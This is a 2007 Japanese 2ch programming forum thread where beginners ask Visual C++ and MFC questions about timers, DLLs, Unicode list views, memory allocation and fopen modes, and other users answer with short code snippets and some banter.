Window Handle -> HWND

256 :デフォルトの名無しさん:2007/01/27(土) 18:10:37
いや、そういうのは分かってるよ...

257 :デフォルトの名無しさん:2007/01/27(土) 18:30:41
そもそも、別のスレッドから描画をする必要があるか、考え直したほうが良いな。

258 :243:2007/01/27(土) 19:11:33
1秒ごとに1文字づつTextOutWで文字を表示していくプログラムを作るつもりなんです。

for(i=0;i<10;i++){
  pDC->TextOutW(0,0,_T("aaa"));
  Sleep(1000);
}

で、それを処理させながら他の処理ができるようにしたいのです。
こんな安易な考え方からスレッドを使おうとすることが間違いなのでしょうか。
OnTimerを使う方法以外で何かよい方法がありましたら是非教えてください。
それとも、やはりOnTimerを使うしかないのでしょうか。

259 :デフォルトの名無しさん:2007/01/27(土) 19:13:56
タイマー使うのが一番簡単な方法だと思うが

260 :243:2007/01/27(土) 19:15:21
>>259
了解しました。 ご回答ありがとうございました。

261 :デフォルトの名無しさん:2007/01/27(土) 19:29:47
キチガイにふりまわされて真面目にレスしてたやつかわいそう

262 :デフォルトの名無しさん:2007/01/27(土) 19:33:48
キチガイにスレッド

263 :デフォルトの名無しさん:2007/01/31(水) 01:17:06
縦横のサイズを500で、ピクチャボックスの中には線が描かれており、、それを1600まで拡大して、
そのピクチャボックスの中の線の色を変更したり、線を書き足したりして、
書いたものを崩さずに任意のサイズまで縮小したんですけど、どうしたらいいのでしょうか?

できれば、500から1600に拡大して線を描くまでの過程を裏で処理できるようにしたいんですけど、
できるでしょうか?

264 :デフォルトの名無しさん:2007/01/31(水) 08:40:51
BYTE byte[4] = {0XFF,0XFF,0XC1,0XC1};
DWORD dword;
でbyte⇔dword間で変換をしたいのですが
byte[0]から見て行って変換するしかないのでしょうか?


265 :デフォルトの名無しさん:2007/01/31(水) 08:43:29
dword = *(DWORD *)byte

ただしエンディアンに注意

266 :デフォルトの名無しさん:2007/01/31(水) 09:37:14
ワンリトルツーリトルスリーリトルエンディアン

267 :デフォルトの名無しさん:2007/01/31(水) 12:15:09
エンディアン嘘付かない

268 :デフォルトの名無しさん:2007/02/01(木) 00:43:04
>265-267

ありがと。リトルエンディアンになることに気をつける

269 :デフォルトの名無しさん:2007/02/01(木) 05:09:18
【環境】
WinXP HomeEdition
Visual C++ 2005 Express Edition

『ねこでもわかるWindowsプログラミング』で勉強を始めたんですが
本に書いてある通りのプロジェクトの作成ができません。

テンプレートに「Win32 プロジェクトがありません」
アプリケーションウィザードで「Windowsアプリケーション」を選択できません。
ビルドしてもwindows.hが無いとエラーが出ます。

そもそもWindowsアプリケーションが作れないようになっていると感じるのですが
ExpressEditionではこれらの操作はできないのでしょうか?

270 :デフォルトの名無しさん:2007/02/01(木) 05:18:46
>>269
ExpressEditionではPlatformSDK入れたら使えるみたい

271 :デフォルトの名無しさん:2007/02/01(木) 07:46:13
いま、「スタンダードVC++」を買おうかなと思ってるんですが、本のなかの開発環境が.NETなんですが、覚えたことは2005でも使えますか?

272 :デフォルトの名無しさん:2007/02/01(木) 08:27:51
>>271
使えるよ

猫でも級に内容が豊富で、EEでも一発でコンパイルが通るサイトがそろそろ欲しいな
でも俺が作ったら、どうしてもIDE関連やプロジェクトの設定で長々と語ってしまって、先に進めないんだよなー



273 :デフォルトの名無しさん:2007/02/01(木) 08:56:49
無料だからやりはじめた初心者と
いままでVCやってた人のギャップが激しすぎる。
C#でもやってりゃいんだよ

274 :デフォルトの名無しさん:2007/02/01(木) 08:59:09
シャープに決めるぜ

275 :デフォルトの名無しさん:2007/02/01(木) 09:53:14
FindFirstFileで探したファイルをifstreamでファイルを開きたいんですけど、
どうしたらいいんでしょうか?

276 :デフォルトの名無しさん:2007/02/01(木) 10:50:58
FindFirstFileでファイル名取れるだろ

277 :デフォルトの名無しさん:2007/02/01(木) 10:53:45
http://msdn.microsoft.com/library/ja/jpfileio/html/_win32_findfirstfile.asp?frame=true
FindFirstFile サンプル付

278 :275:2007/02/01(木) 13:42:01
WIN32_FIND_DATA lp;
char pass[500] = "C:\\Documents and Settings\\abcde\\デスクトップ\\program\\適当\\DATA\\abc.txt";
HANDLE h = ::FindFirstFile(pass, &lp);
if(h != INVALID_HANDLE_VALUE){
ifstream in(lp.cFileName)
if(in){
m_list.InsertString(-1, lp.cFileName);
}

というふうにしたんですけど、ファイルの名前は取れるんですけど、
ファイルが開きません。
どこがまちがってるんでしょうか?

279 :デフォルトの名無しさん:2007/02/01(木) 14:48:31
>>278
lp.cFileNameにどういうファイル名が取れてるか調べればわかるだろう

280 :デフォルトの名無しさん:2007/02/01(木) 14:56:19
あっ できました!
ありがとうございました!

281 :デフォルトの名無しさん:2007/02/01(木) 15:03:28
VC++7.0 MFCでメインウインドウを閉じたときに
全ての後処理開放処理の時間がかかるときがあるアプリケーションが
あると思います。そこで終了処理をある程度表示させて確認したいのですが

なにか良い方法はありますか?

282 :デフォルトの名無しさん:2007/02/01(木) 15:14:44
どうだろ、、、WM_CLOSEとかDESTROYあたりでイベント作って
そのイベントとメッセージをWaitForMultipleObjectsで待ちつつメッセージループ作って
イベントがシグナルになったら閉じる処理の続きとかどうだろう

283 :デフォルトの名無しさん:2007/02/01(木) 16:26:15
>>281
スプラッシュウィンドウ

284 :デフォルトの名無しさん:2007/02/01(木) 17:58:31
スプラッシュマウンテン

285 :デフォルトの名無しさん:2007/02/01(木) 18:10:28
スプラッシュムービー

286 :デフォルトの名無しさん:2007/02/01(木) 22:14:03
VC++.NET2003 Windowsフォームを使用して開発しています。

1画面でかなり多くの数のコントロールを貼り付けているのですが、
デザイン画面を開くとき重くて時間が掛かっています。
また、Releaceでコンパイルしようとすると30分掛かっても終わりません。。
解決策はあるのでしょうか。

1画面で多くのコントロールを表示する理由は、
画面を切り替えずに複数の画面(?)を表示させるという仕様になっているからです。
今はパネルでコンテナ化し、各画面を出したい時にパネルの表示・非表示を
切り替えているのですが、正直限界です。

良い方法があればぜひ教えて下さい。

287 :デフォルトの名無しさん:2007/02/02(金) 08:05:43
メモリを増やす

288 :デフォルトの名無しさん :2007/02/02(金) 08:16:12
お母さんに相談する。

289 :デフォルトの名無しさん:2007/02/02(金) 08:49:20
メモリは1ギガなんですけど・・・
それでも足りないとなると、他の人に委託しずらい等、
色々支障が出てくると思います。
それに、2ギガに増やして早さが倍になっても、
やっぱり遅い気がします。。

290 :デフォルトの名無しさん:2007/02/02(金) 09:16:16
それはメモリの問題ではなくてCPUが余りにも余りにもなんではないだろうか。

291 :デフォルトの名無しさん:2007/02/02(金) 10:23:42
でも1GBと2GBでは段違いの差が出る

292 :デフォルトの名無しさん:2007/02/02(金) 10:49:16
数ヶ月前に購入したマシンなので、環境を変える事はできないです。
そこまで最新のマシンでなければ動かせないのは
やはりおかしいと思うんです。

画面を分け、あたかも1つの画面で動くように見せるという方法がありましたので、
それでやってみたいと思います。
ありがとうございました。

293 :デフォルトの名無しさん:2007/02/02(金) 11:47:33
コントロール並べすぎなのがわるいと気づけ

294 :デフォルトの名無しさん:2007/02/02(金) 12:31:10
それはもちろん分かってました。
だから、それ以外の方法があれば教えて欲しいと思い、
相談させてもらったのですが、、、。

295 :デフォルトの名無しさん:2007/02/02(金) 12:40:13
コントロールが問題になるほど多数あるということは、それらの配置には規則性があるはずだ。
だとすれば、ポトペタせずに自前で生成すればいい。

296 :デフォルトの名無しさん:2007/02/02(金) 19:54:33
うーん。
規則は、ある部分もあるのですが、
画面10枚分ぐらいのコントロールを1つのフォームで配置してるので
自分で書くのはちょっとしんどいですね。。
変わる可能性大ですし。

結局、ユーザーコントロールを画面分用意してやる事にしました。

297 :デフォルトの名無しさん:2007/02/02(金) 23:51:25
……多いと思った段階で分けようって思わないもんかね。

298 :デフォルトの名無しさん:2007/02/03(土) 00:14:14
MFC,SDIでCEditViewを使ってファイルから読み込んだ結果を
エディットボックスに表示しようと考えています。

表示の仕方は下記です。
void CtestView::setEditBox(char *str){
CEdit &edit = GetDitCtrl();
edit.SetWindowText(str); }

ファイルを読み込んで処理した結果をstrに入れるという感じです。
メニューのファイルオープンから読み込んだ場合は下記の
処理でいけるんですが・・・

CtestView *pView = ((CtestView*)(((CFrameWnd*)(AfxGetApp()->m_pMainWnd))->GetActiveView()));
pView->setEditBox(str);

実行ファイルにファイルをドロップして起動させた場合、
ドキュメントの
BOOL CtestDoc::OnOpenDocument(LPCTSTR lpszPathName)
に入るようですが、ここから上記のsetEditBox()を呼び出してもエラーに
なります。
原因は起動時でまだViewが出来ていないことであることは分かっているのですが、
どのタイミングで呼び出せばよいのか分かりません。

どうすればよいのでしょうか?

299 :デフォルトの名無しさん:2007/02/03(土) 00:51:59
>>298
新しいドキュメントを開いたあとは必ず
void CtestView::OnInitialUpdate()
が呼び出されるので、そこで
setEditBox(GetDocument()->GetYourString());

300 :デフォルトの名無しさん:2007/02/03(土) 06:22:59
ファイル読んで表示が終わってからもう一回表示しなおし?
読むときに処理すればいいのでは?

301 :デフォルトの名無しさん:2007/02/03(土) 07:40:52
>>299
今環境がないので試せないですが、そのタイミングでは必ず
ビューが作成されているんですか?

>>300
読むときに処理すればいいんですが、アイコンにドロップして
起動させた場合はタイミングによってビューが作成されていないので
エラーになるんです。

302 :デフォルトの名無しさん:2007/02/03(土) 07:44:51
表示しなおしじゃなく、299をやった上で

> CtestView *pView = ((CtestView*)(((CFrameWnd*)(AfxGetApp()->m_pMainWnd))->GetActiveView()));
> pView->setEditBox(str);

は当然削除だろ。個人的にはCtestDocにCtestView.hをincludeするのは、やってはいけない事だと思う。

303 :デフォルトの名無しさん:2007/02/03(土) 07:48:31
>>301
ドキュメントを読んだあとにビューを更新するために用意されているメソッドだし
当然ビューは存在してるよ。

304 :298:2007/02/03(土) 08:20:28
>>303
分かりました。
ありがとうございます。

305 :デフォルトの名無しさん:2007/02/03(土) 09:14:25
>>272ありがとん

306 :デフォルトの名無しさん:2007/02/03(土) 09:54:09
>>270
ありがとうございます。

せっかく教えて頂いたのにアレなんですが、インストールしようとしたところ
ちょっとCドライブの空きが足りなかったのでしばらくは秀丸とbccでやってみます。

307 :いーぶいしー:2007/02/03(土) 16:42:45
クライアント(.exe)から
自分で作成したDLLに定義されているClassのpubicなメンバ変数に、アクセスしたい場合、
そのメンバ変数が構造体だと、その構造体の定義はクライアント側にも必要なのでしょうか?
定義を一箇所(DLL側のみ)にはできないのでしょうか?

308 :デフォルトの名無しさん:2007/02/03(土) 16:49:16
>>307
もちろん必要、共通でinlcudeする*.hファイルに定義しておく。

C++/CLIのrefクラス、ref構造体は例外だけど

309 :デフォルトの名無しさん:2007/02/04(日) 01:12:51
二色刷りで動物の絵が表紙にデカデカと書いてある本を探しているのですが、
何方かこの本の題名を知らないでしょうか?
なんでも辞書みたいな感じの本で延々とコードが書いてあるらしいのですが。

あとみなさんはどのような本で勉強していますか?
ちなみに僕は学校の授業でやったもののほぼ未経験です。

310 :デフォルトの名無しさん:2007/02/04(日) 01:52:01
> 動物の絵が表紙にデカデカと書いてある本
沢山あるぞ。好きなのを選ぶが良い。
ttp://www.oreilly.co.jp/index.shtml

> どのような本
一冊で完結なんて出来ないんだから
自分の目的にあった本を
(良い意味で)適当に買いつづけていけばいいと思うよ。

↓参考
推薦図書/必読書のためのスレッド PART33
http://pc10.2ch.net/test/read.cgi/tech/1167140188/l50


311 :デフォルトの名無しさん:2007/02/04(日) 18:14:46
すいません。御存知の方がいたら教えてください。
環境:Windows XP,VC++6.0 「_MBCS」指定
Windowsのアプリを作っているのですが、リストビューの部分のみにUnicode文字のデータを表示
させたいので以下のようにリストビューの部分のみワイド文字仕様の構造体を使用しています。
リストビュー設定部のソース
static HWND hList;
LV_COLUMNW lvcol;LV_ITEMW item;
InitCommonControls();
hList = CreateWindowExW(0,WC_LISTVIEWW, L"",WS_CHILD | WS_VISIBLE | LVS_REPORT,
0, 0, 300, 200,hWnd,(HMENU)ID_LISTVIEW,hInst,NULL);
lvcol.mask = LVCF_FMT | LVCF_WIDTH | LVCF_TEXT | LVCF_SUBITEM;
lvcol.fmt = LVCFMT_LEFT; lvcol.cx = 100;
lvcol.pszText = L"項目1"; lvcol.iSubItem = 0;
ListView_InsertColumn(hList, 0, &lvcol);

item.mask = LVIF_TEXT; item.pszText = L"内容1";
item.iItem = 0;item.iSubItem = 0;
ListView_InsertItem(hList, &item);
これで実行すると、リストビュー部に表示される文字が全て16進で表示されてしまいます。
正常に「項目1」,「内容1」で表示させる方法は、無いのでしょうか?
ListView_InsertColumnの部分のヘッダファイルを見ると
#define ListView_InsertColumn(hwnd, iCol, pcol) \
(int)SNDMSG((hwnd), LVM_INSERTCOLUMN, (WPARAM)(int)(iCol), (LPARAM)(const LV_COLUMN FAR*)(pcol))
となっているから無理なのかな?よろしくお願いします。


312 :デフォルトの名無しさん:2007/02/04(日) 18:39:30
>>311
とりあえずListView_InsertColumn中のSNDMSGがSendMessageAになってる。
LVM_INSERTCOLUMNもAつきのほうだし。
マクロは全滅なきがする。

313 :311:2007/02/04(日) 21:09:25
>>312
ありがとう。
やっぱプロジェクト自体をUnicode仕様にするしかないのかな?
>マクロは全滅なきがする。
マクロ以外で実現する方法ってあるの?


314 :311:2007/02/04(日) 21:25:03
とりあえず以下のように自分でマクロを作ってみたらうまく表示できた。
#define ListView_InsertColumn_W(hwnd, iCol, pcol) \
(int)SendMessageW((hwnd), LVM_INSERTCOLUMNW, (WPARAM)(int)(iCol), (LPARAM)(const LV_COLUMNW FAR*)(pcol))
これだけで問題ないんだろうか?


315 :デフォルトの名無しさん:2007/02/04(日) 21:38:50
>>311-312
SNDMSGは単にSendMessageとして定義されているから、
当然プログラム全体をUNICODE化すればマクロがそのまま使えるんだ。

逆に言えばSendMessageがSendMessageWになりさえすればいいわけだから、
UNICODEとしてマクロを使いたい部分の前にこれ、
#pragma push_macro("SendMessage")
#undef SendMessage
#define SendMessage SendMessageW
後に#pragma pop_macro("SendMessage")を置けばいけると思う。
push_macro/pop_macroがVC6でも使えるかどうかは知らないけど。

316 :311:2007/02/04(日) 22:00:59
>>315
ありがとう。
#pragma push_macro("SendMessage")
#undef SendMessage
#define SendMessage SendMessageW
InitCommonControls();


item.mask = LVIF_TEXT; item.pszText = L"内容1";
item.iItem = 0;item.iSubItem = 0;
ListView_InsertItem(hList, &item);
#pragma pop_macro("SendMessage")
上記のように修正してみたが、コンパイルは通ったが、表示結果は16進のままだった。
VC++6.0では、push_macro/pop_macroが使えないのかもしれない。
>>314に書いた方法でやってみます。
ありがとう。


317 :298:2007/02/06(火) 07:43:06
OnInitialUpdate() で実行することが出来ました。
もう一つ教えてください。
エディットボックスなどのコントロールの初期化処理を
したいのですが、どのタイミングでやればいいんでしょうか?

WM_CREATEではまだコントロールが作成されていません。
OnInitialUpdate() では問題ないのですが、最初の一度だけと
いう訳にはいきません。

static BOOL flag;
を使ってifで判定して最初だけ実行すれば出来たのですが、
もっとスマートな方法はありますでしょうか?

318 :デフォルトの名無しさん:2007/02/06(火) 08:54:09
OnInitialUpdateは最初の一度という意味

319 :デフォルトの名無しさん:2007/02/06(火) 10:39:28
>>317
Documentが変わってもView内のコントロールの位置やサイズが変わらない
タイプのアプリの場合は、自分もOnInitialUpdateでstaticなフラグ使って
一回だけやってる。特に問題ないと思うけど。

これ以上はアプリ形態と初期化内容が判らない限り何ともいえない。

320 :デフォルトの名無しさん:2007/02/06(火) 16:24:36
ヘッダファイルに変数を追加するだけで
アプリケーション起動時にOSがエラーを出してくることがあります
もう一つ二つ意味のない変数を追加すれば治ることもあるのですが
これはどうしてなのですか?変数追加だけなので
プログラムの中で使ってもいません名前も被っていないです
どんな変数でもこの症状が起こるときは起こります

321 :デフォルトの名無しさん:2007/02/06(火) 16:28:09
領域外アクセスとかのバグが変数追加で表面化したんだろ

322 :デフォルトの名無しさん:2007/02/06(火) 16:29:38
つまり他の変数になにか問題があるということですか?

323 :デフォルトの名無しさん:2007/02/06(火) 16:41:35
Runtime Error!
Program:_xxxxxxxxxxx ←exeの場所
abnormal program termination

こんな感じで表示されます
今回は他の変数を追加しても直りません
助けてください。アクセス外ということは文字列かなにか
静的に領域をとってる配列等が原因なのでしょうか?

324 :デフォルトの名無しさん:2007/02/06(火) 16:48:23
文字列20文字もいらない文字の領域を200にしたらいけました
うーん無駄に領域を確保すれば直るなんて謎だ

325 :デフォルトの名無しさん:2007/02/06(火) 16:54:18
謎っつーか、メモリの管理がすげー甘いんじゃなかろうか
一度きっちり調べ直してみることをお薦めする

326 :デフォルトの名無しさん:2007/02/06(火) 17:14:52
すいません独学なんですがメモリ管理では
全てのメンバ変数にdeleteをしたほうがいいのでしょうか?

327 :デフォルトの名無しさん:2007/02/06(火) 17:19:11
newしたものにはdelete、new[]したものにはdelete[]。
逆にnewしていないものにdeleteは要らない。

ただし可能な限り、std::vectorなどnew[]/delete[]を隠匿したものを使ったり、
boost::shared_ptr/arrayやboost::scoped_ptr/array、std::auto_ptrなど、
せめてdelete/delete[]だけでも隠匿して使うようにすべき。

328 :デフォルトの名無しさん:2007/02/06(火) 17:22:56
文字列などは配列で静的に確保しないほうがいいのでしょうか?
newで動的確保するべきなのですか?

329 :デフォルトの名無しさん:2007/02/06(火) 17:26:58
大量にバッファを必要とするのならともかく、
そうでないのなら静的確保で十分

330 :デフォルトの名無しさん:2007/02/06(火) 17:30:17
私はその他のオブジェクトもnewで動的確保はしていませんでしたので
deleteを使うところが見当たりません
原因は全て静的にしているせいなのでしょうか?

331 :デフォルトの名無しさん :2007/02/06(火) 17:36:36
いまだにdllの仕組みが理解できません。
猫でものホームページ見ながら作ってみたんですが
dllを作った時のヘッダを含めて
かつその時出来たlibファイルを
#pragma comment(lib,"〜.lib)
か、リンカの設定でリンクしないと使えないのは
libを通してやらないと、dll内の関数を呼び出すことは出来ないと
いう事なんでしょうか。
LoadLibraryを使っても意味無かったので、よくわからないです。
どなたか教えて頂ければ幸いです。

VS2005というIDE環境で勉強してるから楽出来てる分その楽
出来ている理由が解って無く勉強不足になってると自らは思います。


332 :デフォルトの名無しさん:2007/02/06(火) 17:41:21
>>330
「静的」「動的」の意味が分かっていないような気がする。

コードの中で
  int i;
  char String[80];
とかやるのが「静的確保」。これらの変数は実行ファイルがメモリ上に
ロードされた時点で既に存在していて、終了と同時に消滅する。
グローバル変数だろうが(クラスの)メンバ変数だろうがそれは同じ。
したがって delete/delete[] は必要ない。

333 :デフォルトの名無しさん:2007/02/06(火) 17:48:03
>>331
LoadLibraryで読み込んだDLLの関数を呼び出すには、
GetProcAddressで関数のアドレスを取得するんだよ。

334 :デフォルトの名無しさん:2007/02/06(火) 17:49:34
>>331
VS2005で「DLLを作る」と言ったときには自動的にLIBファイルも作られるけど、
この2つは完全に別種のもの。中身は一緒、ただ使い方が違う。

LIBファイルは静的リンク用のファイル。
自分の実行ファイルの中に(コンパイルの時点で)取り込んでしまって、
あたかも自分の書いたコードと同じように使えます、というもの。
だからLIBを組み込むときにはリンカなり#pragmaなりで予め設定をして、
コンパイルのときにリンクすることを明示しなければならない。

DLLは動的リンク用のファイル。
一般的には、まずLoadLibrary()でDLLファイルを読み込み、
(そこでもし成功したなら)次にGetProcAddress()で
DLLの中に埋め込まれた関数を取り出して使う、
最後にFreeLibrary()でDLLを自分のプログラムから取り外す、
という段取りを踏む。
コンパイル時には存在しなくても構わない、実行時にあればいい。

335 :デフォルトの名無しさん:2007/02/06(火) 17:55:16
>>332
うーんということは私が知らず知らずのうちに
どこかで動的確保しているということでしょうか?

336 :デフォルトの名無しさん:2007/02/06(火) 18:02:34
>>334
>VS2005で「DLLを作る」と言ったときには自動的にLIBファイルも作られるけど、 
このLIBはインポートトライブラリ。
LoadLibraryやらGetProcAddressやらメンドクサイ処理をしてくれる短いモジュール。
これを静的にリンクすればDLLの呼び出しが簡単に出来る。
インポートトライブラリがあるなら極力使ったほうが楽。

337 :デフォルトの名無しさん:2007/02/06(火) 18:05:31
インポートトライブラリ
インポートトトライブラリ
インポートトトトライブラリ

338 :320:2007/02/06(火) 18:12:06
スレッドオブジェクトの配列をグローバル変数にしてるんですが
これはまずいですか?せめて原因をつきとめたいです

339 :デフォルトの名無しさん:2007/02/06(火) 18:12:57
>>335
動的確保はスタックに積むケースとnewやmallocなどでヒープから確保するケースがある。
静的確保はstaticで定義した場合(明示的にstaticをg使わないケースも含む)
クラス内のメンバー変数はクラスがどう生成されたかによる。

>>336
誤字をさらにコピーしてしまったか、インポートライブラリだな。


340 :331:2007/02/06(火) 18:44:51
>>333さん
>>334さん
>>336さん
ご教授ありがとうございました。
GetProcAddress()FreeLibrary()ってのも必要なんですね。
それと、dll作った時のlibはインポートライブラリなんですね。
「プログラムはなぜ動くのか」って本を読んだにもかかわらず
流し読みで頭に入っておらず再読したらちゃんと書いてありました。
はぁ、馬鹿だな俺って。

341 :デフォルトの名無しさん:2007/02/06(火) 19:56:07
SendMessageであるウィンドウにDボタンを送りたいのですが、
SendMessage(hwnd,
このあとをどうすればよいのでしょうか。
ご教授願います。

342 :デフォルトの名無しさん:2007/02/06(火) 20:06:34
>はぁ、馬鹿だな俺って。
それに気がつくことができれば、今後はもっと「馬鹿」じゃなくなるでしょう。
そうやって向上できる人間が、「賢い」のです。
#で、「ご教示」ですね。

>>320
ソース公開しちゃった方が話が早そうですね。

343 :デフォルトの名無しさん:2007/02/06(火) 20:07:43
>>341
Dボタンってなんですか?
マウスクリックのイベントを送りたいなら、Spy++でどういうパラメータを渡せばいいか覗いてみると宜しいかと。

344 :317:2007/02/06(火) 21:25:08
>>319
フラグを使うのは普通なんですね。
ありがとうございました。

345 :デフォルトの名無しさん:2007/02/07(水) 00:17:13
>>320
いろいろ言われてるけど、とりあえず
配列利用時に、添え字がオーバーアクセスしてないか確認するべし。

> 原因を突き止めたい
デバッガを上手に利用しましょう。
ある特定のメモリ空間にアクセスした時にbreakかけることも出来たはず。
詳しくは「ブレークポイント」をMSDNで調べてくれ。

346 :デフォルトの名無しさん:2007/02/07(水) 00:59:43
基礎的すぎる質問なんですが、


ダイアログエディタで適当にあれこれコントロールを張ったとき、
VC++2003でビルドしたプログラムを98SEで走らせると、

コントロールのマルチバイト文字がすべて文字化けする。
エディットボックスに直接マルチバイト文字入れても同じく。
メニューバーやステータスバーは文字化けしない。

文字はTCHAR系統を使い、ビルドした結果はすべてwchar_tになっているはず。


このような状況で、文字化けさせない用にする方法を教えてくださいませんでしょうか?

347 :デフォルトの名無しさん:2007/02/07(水) 01:47:02
9xはUNICODE対応していないから、MSLUを使うか非UNICODEにするかしないとだめだよ。

348 :デフォルトの名無しさん :2007/02/07(水) 02:07:28
2000とXPは内部コードはUnicodeだけど98とかはどうなんだろう。
localeまわりかな?Unicode適応しないでビルドしたらSJISになっていけるのかな?

349 :デフォルトの名無しさん:2007/02/07(水) 02:23:29
>>347
なるほど…
わかりました。
ありがとうございました。

350 :デフォルトの名無しさん:2007/02/07(水) 09:03:22
>>346
マルチバイト文字(列) と ワイド文字(列) の意味を
使い分けられて無い気がするぞ。

マルチバイト文字列は char* で
ワイド文字列は wchar_t* だ。

351 :デフォルトの名無しさん:2007/02/07(水) 10:14:21
そもそもダイアログでコードページ932で作ってたりして

352 :デフォルトの名無しさん:2007/02/07(水) 10:18:25
クラスのメンバ変数についての質問です
グローバル変数としてビュークラスの外で宣言したクラスの
メンバ変数は0や空文字で初期化されてるんですが

そのクラスをビュークラスのメンバとして宣言するとそのクラスの
メンバ変数が初期化されないのはどうしてですか?

353 :デフォルトの名無しさん:2007/02/07(水) 10:26:03
>>352
C++スレ行くか
C++の入門書でも読んで勉強してください

354 :デフォルトの名無しさん:2007/02/07(水) 10:31:05
>>353
わからないんですね

355 :デフォルトの名無しさん:2007/02/07(水) 10:36:05
入門書にしっかり書いてある

356 :デフォルトの名無しさん:2007/02/07(水) 10:39:04
http://pc10.2ch.net/test/read.cgi/tech/1167476845/
ではここで教えてください

357 :デフォルトの名無しさん:2007/02/07(水) 11:03:34
グローバル変数はコンパイル時に場所が決まってるから

358 :デフォルトの名無しさん:2007/02/07(水) 16:30:17
というより、C/C++の規格でそうなると定められているためと言ったほうがいいと思う。

359 :デフォルトの名無しさん:2007/02/07(水) 16:33:10
どうだろね。
仕組みから入ったほうが、そう決まってるからそうなんだ、より納得いくかもしれんし

360 :デフォルトの名無しさん:2007/02/07(水) 17:01:56
実装がそうだからそれが正しいという保証はどこにもない

361 :デフォルトの名無しさん:2007/02/07(水) 17:25:43
逆にこれは実装が先にあって仕様が追いついた例でもあるな。
構造体のコピーも似たようなもの。

362 :デフォルトの名無しさん:2007/02/07(水) 18:49:23
VC++7.0でライブラリファイルをリンクする方法を教えてください
winsockライブラリを使いたいのでお願いします

363 :デフォルトの名無しさん :2007/02/07(水) 19:23:53
#pragma comment(lib, "Mswsock.lib")

364 :269:2007/02/08(木) 08:10:55
269です。たびたび申し訳ありません。

SDK入れてWindowsアプリが作れるようになったんですが、ダイアログやアクセレータ等の
リソーススクリプトファイル(.rc)をエディットするResEditorがついてないみたいなので断念しそうです。
というかそれが目的だったので。
Windowsフォーム(.h)は作れるみたいですがどうしていいのかわかんないです。

Visual Studio 2005 Academic Editionだったらリソーススクリプトファイル(.rc)の作成は可能でしょうか?
可能ならば購入したいと思います。よろしくお願いします。

365 :デフォルトの名無しさん:2007/02/08(木) 10:01:56
MSに訊け

366 :デフォルトの名無しさん:2007/02/08(木) 10:07:23
>>363
ありがとうございます

367 :デフォルトの名無しさん:2007/02/08(木) 10:35:00
>>364
可能だがフリーのエディタもあるよ

368 :デフォルトの名無しさん:2007/02/08(木) 11:04:04
メモ帳でええがな

369 :デフォルトの名無しさん:2007/02/08(木) 11:50:13
VisualStudio2005C++ExpressEditionにて
#include "stdafx.h"
#include"stdio.h"

int _tmain(int argc, _TCHAR* argv[])
{
FILE *fp=fopen("d:/test.txt","rw");
というコードを書きました。
FILE文付近で「〜Expression:(Invalid file open mode",0)〜」
というダイアログボックスがでます。
CRTセキュリティ強化されたためということですが、このセキュリティを
弱くしたいと思います。どのようにすればよいですか?

370 :デフォルトの名無しさん:2007/02/08(木) 11:50:39
WinSockのAPIを使ってphpから文字列を取得することはできますか?

371 :デフォルトの名無しさん:2007/02/08(木) 12:12:23
>>369
セキュリティ強化用の関数が追加されたけど
標準関数の仕様はかわらないのでは?

372 :デフォルトの名無しさん:2007/02/08(木) 12:18:22
>>370
プロトコル次第

373 :デフォルトの名無しさん:2007/02/08(木) 12:20:17
>>372
httpなんですが
あとサーバーに送る文字列の改行コードは\nで大丈夫でしょうか?

374 :デフォルトの名無しさん:2007/02/08(木) 13:09:22
>>371
標準関数の仕様はかわらないのでは?
たぶんそうだと思うのですがうまくいかないです。


375 :デフォルトの名無しさん:2007/02/08(木) 13:18:46
エラー通り"rw"が悪い

376 :デフォルトの名無しさん:2007/02/08(木) 14:04:09
>>275
VisualStudio2003だとうまくいくのですが、
構文的にrwなんてつけたらだめなのですか?

377 :デフォルトの名無しさん:2007/02/08(木) 15:05:50
unicodeかなんかじゃないの?

378 :デフォルトの名無しさん:2007/02/08(木) 15:56:14
"rw" なんてのは無い

379 :デフォルトの名無しさん:2007/02/08(木) 16:37:09
MSDNこういう例ものってるし "rw" もあるだろ

http://msdn2.microsoft.com/ja-jp/library/yeby3zcb(VS.80).aspx

fopen("newfile.txt", "rw, ccs=<encoding>");

380 :デフォルトの名無しさん:2007/02/08(木) 17:11:52
多分すごい有名な
「新VisualC++6.0入門ビギナー編 林春比古署 ソフトバンク社」
を使って今勉強中なんですが、
241ページのサンプルプログラムで、
CPenクラスのオブジェクトのポインタ、’oldPen’ってゆうのを、
’旧ペン’と銘打って保存って書いてありますが、
これをする意味がわかりません。
わざわざポインタでなぜ確保しているのでしょうか?
pDC->SelectObject(&CPen型Object)で選択して書くだけなのに、
別に’旧ペン’を保存しておく必要があるのでしょうか?
私が簡単に確認した程度では、
oldPen 自体設定しなくても実行可能でしたし、
最後に’旧ブラシに戻す’ってゆう作業もなくても問題ありませんでした。
他にもいろいろ記述してoldPenの有用な使い方を検証しましたが、
やればやるほど意味がないのではという考えに傾きます。
大変限定的な質問ですが、
よければ本を持ってる方、もしくはよく知ってらっしゃる方でわかる方がいれば
教えていただけないでしょうか?




381 :デフォルトの名無しさん:2007/02/08(木) 17:21:08
MSDNのサンプルだとこんな感じだね

void CMyView::OnDraw( CDC* pDC )
{
CPen penBlack; // Construct it, then initialize
if( newPen.CreatePen( PS_SOLID, 2, RGB(0,0,0) ) )
{
// Select it into the device context
// Save the old pen at the same time
CPen* pOldPen = pDC->SelectObject( &penBlack );

// Draw with the pen
pDC->MoveTo(...);
pDC->LineTo(...);

// Restore the old pen to the device context
pDC->SelectObject( pOldPen );
}
else
{
// Alert the user that resources are low
}
}

382 :デフォルトの名無しさん:2007/02/08(木) 17:24:47
http://forums.belution.com/ja/vc/000/049/00.shtml
メモリ上のDCは元に戻すべきか?

383 :デフォルトの名無しさん:2007/02/08(木) 17:24:47
>>380
ttp://msdn2.microsoft.com/en-us/library/ms533272.aspx
>An application should always replace a new object with the original, default object after it has finished drawing with the new object.

384 :デフォルトの名無しさん:2007/02/08(木) 17:28:50
げ、マルチか

385 :デフォルトの名無しさん:2007/02/08(木) 18:10:14
だな
http://pc10.2ch.net/test/read.cgi/tech/1164787254/200-

386 :デフォルトの名無しさん:2007/02/08(木) 18:56:26
>>379
VS2005でソースみてみな

387 :デフォルトの名無しさん:2007/02/08(木) 20:16:15
プログラムからtabindexの設定をするには?

388 :デフォルトの名無しさん:2007/02/08(木) 20:20:28
>>369>>379
C/C++の標準規格としては"rw"なんてありません。
標準で認められているのは"r", "w", "a", "r+", "w+", "a+"及び
それにバイナリモードのbを2-3文字目(+とは順不同)に入れたもののみです。
勿論Visual C++はViusal C++で色々と独自に拡張はしていますが。

389 :デフォルトの名無しさん:2007/02/10(土) 17:51:19
